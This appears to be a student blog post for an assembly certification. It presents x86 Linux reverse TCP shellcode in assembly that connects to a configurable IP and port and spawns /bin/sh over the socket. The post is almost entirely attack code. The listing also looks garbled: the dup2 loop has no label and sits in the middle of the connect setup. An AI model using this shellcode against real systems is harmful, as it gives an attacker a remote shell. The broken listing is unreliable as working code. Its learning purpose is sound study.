Now to create a reasonably well optimized linux Reverse TCP shellcode (66 bytes):

“\x7f\x00\x00\x01” <- IP address
“\x0d\xf0” <- Port 3568

; Title Linux Reverse Shell TCP Shellcode v0.1
; Author npn
; License
; Legitimate use and research only
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of

global _start

section .text

xor ebx, ebx	;zero ebx
mul ebx		;zero eax
push edx	;0
inc ebx		;socket()
push ebx	;1
push byte 0x2	;2
mov ecx, esp	;move argument ptr to ecx
mov al, 0x66	;syscall socketcall
int 0x80	;socket()

xchg ebx, eax 	;eax = 2, ebx = fd
pop ecx 	;2

;connect stack prepare
push 0x0100007f		;only nulls in This can be changed to any IP
push word 0xf00d	;3568
push word cx		;af_inet

	mov al, 0x3f	;dup2
	int 0x80
	dec ecx
	jns dup2

;connect continue stack prepare
mov ecx, esp		;move arg ptr to ecx
push byte 0x10
push ecx		;ptr to arg ptr (ecx)
push ebx		;fd
mov ecx, esp
mov al, 0x66
int 0x80

push edx	;0
push 0x68732f6e	;"n/sh"
push 0x69622f2f	;"//bi"
xor ecx, ecx
mov ebx, esp	;move argument ptr to ebx
mov al, 0xb	;execve()
int 0x80

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE-158